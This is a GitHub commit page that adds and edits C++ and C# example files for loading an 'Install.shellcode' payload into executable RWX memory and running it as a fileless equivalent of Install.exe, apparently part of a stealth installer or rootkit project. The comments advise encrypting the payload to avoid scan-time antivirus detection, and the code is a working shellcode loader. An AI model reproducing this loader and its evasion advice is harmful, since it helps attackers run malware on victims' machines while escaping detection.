Skip to content

Commit

Permalink
Documentation
Browse files Browse the repository at this point in the history
  • Loading branch information
bytecode77 committed Sep 1, 2022
1 parent 21ee0ac commit 42af739
Show file tree
Hide file tree
Showing 3 changed files with 42 additions and 5 deletions.
Binary file modified Docs/Documentation.docx
View file
Binary file not shown.
12 changes: 7 additions & 5 deletions Examples/InstallShellCode.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,22 +2,24 @@

// Example on how to use Install.shellcode

// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode
// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.

int main()
{
// --- Elevated privileges required ---

// 1. Load Install.shellcode from resources or from a BYTE[]
// Ideally, encrypt the file and decrypt it here to avoid scantime detection
// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
LPBYTE shellCode = ...

// 2. Make the shellcode RWX
// 2. Make the shellcode RWX.
DWORD oldProtect;
VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect);

// 3. Cast the buffer to a function pointer and execute it
// 3. Cast the buffer to a function pointer and execute it.
((void(*)())shellCode)();

// This is the fileless equivalent to executing Install.exe
// This is the fileless equivalent to executing Install.exe.

return 0;
}
35 changes: 35 additions & 0 deletions Examples/InstallShellCode.cs
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
using System;
using System.Runtime.InteropServices;

// Example on how to use Install.shellcode

// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.

public static class Program
{
public static void Main()
{
// --- Elevated privileges required ---

// 1. Load Install.shellcode from resources or from a byte[]
// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
byte[] shellCode = ...

// 2. Create an RWX buffer with the shellcode.
IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
Marshal.Copy(shellCode, 0, buffer, shellCode.Length);

// 3. Start the shellcode in a thread and wait until it terminated.
IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
WaitForSingleObject(thread, 0xffffffff);

// This is the fileless equivalent to executing Install.exe.
}

[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);
[DllImport("kernel32.dll")]
private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);
[DllImport("kernel32.dll")]
private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
}

0 comments on commit 42af739

Please sign in to comment.